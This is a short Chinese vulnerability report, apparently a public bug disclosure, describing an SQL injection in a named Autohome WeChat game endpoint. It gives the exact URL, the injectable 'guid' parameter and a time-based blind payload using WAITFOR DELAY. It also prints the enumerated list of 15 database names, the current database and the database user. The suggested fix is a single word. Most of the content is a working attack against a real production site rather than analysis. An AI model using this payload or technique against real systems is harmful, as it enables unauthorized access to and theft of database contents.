汽车之家某站存在SQL注入漏洞

本来想来个验证脚本的,时间关系还是直接给结果吧
weixin.autohome.com.cn/WeiXinGame/ShowResult?username=test&guid=60dcaec0-86ac-466f-bfc2-3538738047eb
注入参数#guid
Payload: username=test&guid=60dcaec0-86ac-466f-bfc2-3538738047eb';WAITFOR DELAY '0:0:5'--
available databases [15]:
[*] [AutoMaintain\x05]
[*] [MONITOR\x05]
[*] Aladdin
[*] AutoTerminology
[*] AutoWeiXin
[*] CarDiscount
[*] DBMONITOR
[*] master
[*] model
[*] msdb
[*] Reproduction
[*] tempdb
[*] VS_MONITOR
[*] WeiBo
[*] WeiXIn
当前数据库:    'AutoWeiXin'
数据库用户:    'AutoWeixinWriter'
解决方案:
过滤